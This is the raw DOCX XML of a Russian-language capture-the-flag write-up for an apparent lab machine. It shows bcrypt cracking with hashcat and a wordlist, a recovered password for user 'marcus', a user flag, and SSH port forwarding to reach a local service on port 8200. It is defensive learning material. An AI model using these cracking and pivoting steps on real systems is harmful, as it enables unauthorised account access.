        <w:t xml:space="preserve">Приступаю к подбору пароля. Для этого использую инструмент </w:t>
      </w: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  <w:t>hashcat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. В базе данных hashcat этот хэш определен под номером 3200 и называется </w:t>
      </w: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bcrypt $2*$, Blowfish (Unix) .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С помощью команды </w:t>
      </w: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  <w:t>hashcat -a 0 -m 3200 hash.txt --wordlist /usr/share/wordlists/rockyou.txt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 мне удалось найти пароль маркуса:</w:t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175760"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="12" name="Image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175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ab/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ab/>
        <w:t xml:space="preserve">Итак, ещё одни валидные данные: </w:t>
      </w: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  <w:t>marcus:12345678910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. Аутентифицируюсь как marcus:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:spacing w:val="0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pacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28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38775" cy="1933575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="13" name="Image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4" descr="" titl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1933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 xml:space="preserve">В директории </w:t>
      </w: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marcus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находился первый флаг:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:spacing w:val="0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pacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr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175760"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="14" name="Image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5" descr="" titl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175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ab/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ab/>
        <w:t>Пользовательский флаг: 6a57b6627e40a55b8e18fecb927c1a0b</w:t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ab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="star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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Этап 5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Cs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Повышение привелегий</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0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ab/>
        <w:t>Приступаю к повышению привелегий (marcus → root):</w:t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ab/>
        <w:t>Стандартные методы повышения привелегий не сработали. Тут я вспомнил про тот фильтрующийся порт. Кроме, 8084 порта появилось еще несколько:</w:t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175760"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="15" name="Image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3" descr="" titl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175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ab/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ab/>
        <w:t xml:space="preserve">Пожалуй, начнем с начала. Первый порт – 8200. Сделаю переадресацию портов. Для начала мне необходимы ssh ключи marcus, копирую их на свою машину. Используя команду </w:t>
      </w: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ssh -L 8200:127.0.0.1:8200 marcus@10.10.11.30 -i id_rsa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, произвожу переадресацию:</w:t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203700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="16" name="Image1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 titl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203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ab/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ab/>
        <w:t>Со своего браузера подключаюсь к 8200-ому порту:</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/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-31750</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>78105</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6332220" cy="3861435"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="17" name="Image1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 title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8614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ab/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ab/>
        <w:t xml:space="preserve">Возможно, это какое-то приложение для проверки дубликатов среди паролей или аутентификации. Попробую найти в системе какие-нибудь данные об этом. С помощью команды </w:t>
      </w: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find / -type f -name "*duplicati*" 2&gt;/dev/null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я нашел следующее:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:spacing w:val="0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pacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w: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203700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="18" name="Image1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 title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203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pacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:spacing w:val="0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pacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:spacing w:val="0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pacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:spacing w:val="0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pacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:spacing w:val="0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pacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:spacing w:val="0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pacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:spacing w:val="0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pacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:spacing w:val="0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pacing w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32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spacing w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Этап 6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pacing w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Скачивание полезной информации (окончание работы)</w:t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  <w:font w:name="Times New Roman">
    <w:charset w:val="01"/>
    <w:family w:val="roman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start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:start="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:start="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:start="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:ind w:start="1800" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:start="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2520"/>
        </w:tabs>
        <w:ind w:start="2520" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:start="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3240"/>
        </w:tabs>
        <w:ind w:start="3240" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3600"/>
        </w:tabs>
        <w:ind w:start="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:start="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2)"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:start="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="(%3)"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:start="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:ind w:start="1800" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:start="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2520"/>
        </w:tabs>
        <w:ind w:start="2520" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:start="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3240"/>
        </w:tabs>
        <w:ind w:start="3240" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3600"/>
        </w:tabs>
        <w:ind w:start="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3">
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:start="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:start="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:start="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:ind w:start="1800" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:start="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2520"/>
        </w:tabs>
        <w:ind w:start="2520" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:start="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3240"/>
        </w:tabs>
        <w:ind w:start="3240" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3600"/>
        </w:tabs>
        <w:ind w:start="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4">
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:start="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:start="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:start="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:ind w:start="1800" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:start="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2520"/>
        </w:tabs>
        <w:ind w:start="2520" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:start="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3240"/>
        </w:tabs>
        <w:ind w:start="3240" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3600"/>
        </w:tabs>
        <w:ind w:start="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5">
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:start="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:start="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:start="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:ind w:start="1800" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:start="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2520"/>
        </w:tabs>
        <w:ind w:start="2520" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:start="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3240"/>
        </w:tabs>
        <w:ind w:start="3240" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3600"/>
        </w:tabs>
        <w:ind w:start="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6">
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:start="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:start="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:start="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:ind w:start="1800" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
